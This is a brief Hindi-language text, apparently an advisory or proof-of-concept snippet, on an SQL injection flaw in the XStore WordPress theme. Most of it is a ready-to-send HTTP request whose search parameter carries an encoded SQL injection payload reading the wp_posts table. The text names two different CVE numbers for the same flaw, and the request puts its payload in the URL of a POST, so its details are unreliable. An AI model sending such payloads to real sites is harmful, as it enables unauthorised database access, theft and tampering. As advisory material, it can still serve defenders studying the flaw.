
(CVE-2024-33559) WordPress के लिए XStore थीम, उपयोगकर्ता द्वारा प्रदान किए गए पैरामीटर पर अपर्याप्त एस्केपिंग और मौजूदा SQL क्वेरी पर पर्याप्त तैयारी की कमी के कारण SQL इंजेक्शन के प्रति संवेदनशील है।
CVE-2024-33551 एक SQL इंजेक्शन भेद्यता है जो 8theme XStore में पाई गई, जो WordPress पर निर्मित एक ई-कॉमर्स प्लेटफॉर्म है। यह भेद्यता हमलावरों को डेटाबेस पर दुर्भावनापूर्ण SQL कमांड निष्पादित करने की अनुमति देती है, जो डेटा की चोरी, विलोपन या यहां तक कि परिवर्तन का कारण बन सकती है।
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1